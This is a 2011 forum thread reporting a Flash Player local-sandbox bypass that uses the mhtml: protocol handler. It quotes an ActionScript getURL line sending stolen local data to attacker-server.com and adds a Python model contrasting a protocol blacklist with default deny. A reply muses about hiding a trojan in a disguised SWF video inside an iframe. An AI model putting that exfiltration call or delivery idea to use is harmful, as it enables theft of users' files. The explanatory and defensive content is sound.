begood Posted January 6, 2011

Flash applications run locally can read local files and send them to an online server – something which the sandbox is supposed to prevent.

Flash includes a number of sandboxes which impose restrictions depending on the origin of, and access rights for, the SWF file. Local SWF files, for example, run within the local-with-file-system sandbox and are permitted to access local files. They are not able to access the network, so a malicious SWF applet should not be able to send local data to a remote server.

However, security specialist Billy Rios has determined that Adobe controls access to the network using a blacklist of protocol handlers. Protocols such as HTTP and HTTPS are blacklisted. Rios reports that it is in principle possible to send files to a server using the file: protocol handler, but that this is only possible within the local area network. He has identified another protocol handler which can be used to send data to remote servers – mhtml.

Mhtml is supported by default under Windows, so that, according to Rios, local data can be sent to a remote server using the ActionScript command: getURL('mhtml:http://attacker-server.com/stolen-data-here', '');. Rios has not provided a specific demo SWF file to illustrate the problem.

It is certainly surprising that it is so easy to bypass one of the Flash sandboxes. However, this particular issue does not represent a major risk as few users download SWF files and run them locally. SWF files are generally loaded directly in a browser Flash plug-in, which uses a different rule set.

Source: Flash Player sandbox can be bypassed - The H Security: News and Features
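Added example (not part of the original post or the article, and not Adobe's code): a simplified Python model of why a blacklist of protocol handlers lets the mhtml: URL quoted above through, while a default-deny policy rejects it. The policy sets, function names and every sample URL except the mhtml one are assumptions made for illustration.

```python
import re

# RFC 3986 scheme syntax: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) ":"
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")

# Assumption: the blacklist holds only the two schemes the article names.
DENIED_SCHEMES = {"http", "https"}
# Hypothetical default-deny policy for local content: no handler is allowed,
# only relative references (no scheme at all).
ALLOWED_SCHEMES = frozenset()


def scheme_chain(url):
    """Peel leading schemes: 'mhtml:http://h/x' -> ['mhtml', 'http']."""
    chain, rest = [], url.strip()
    while (m := _SCHEME.match(rest)):
        chain.append(m.group(1).lower())
        rest = rest[m.end():]
    return chain


def denylist_permits(url):
    """Blacklist: only the outermost handler is compared with the list."""
    chain = scheme_chain(url)
    return not chain or chain[0] not in DENIED_SCHEMES


def allowlist_permits(url):
    """Default deny: every handler in the chain must be explicitly allowed."""
    return all(s in ALLOWED_SCHEMES for s in scheme_chain(url))


def audit(urls):
    """URLs that pass the blacklist but fail the default-deny policy."""
    return [u for u in urls if denylist_permits(u) and not allowlist_permits(u)]


# Constructed samples; only the mhtml URL is taken from the article.
SAMPLES = [
    "http://example.com/upload",
    "HTTPS://example.com/upload",
    "mhtml:http://attacker-server.com/stolen-data-here",
    "file://fileserver.example/share/drop.txt",
    "assets/movie.swf",
]

if __name__ == "__main__":
    for u in audit(SAMPLES):
        print("blacklist gap:", scheme_chain(u), u)
```

The two URLs returned by audit() correspond to the two handlers the article says are not covered by the blacklist: mhtml, which wraps an http URL, and file.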
luke999 Posted January 6, 2011

Aha... I get it, so the guy puts the trojan in the SWF and it activates when it runs... wow, what an ingenious idea, just think about it... you make a site and put in an iframe with a little video... of course it's not really a video and you change its extension, right? But I don't think it treats it like an exe if you change the extension... damn, anyway, if you sit and think about it, it's brilliant. Surely it will get fixed after some time... good post!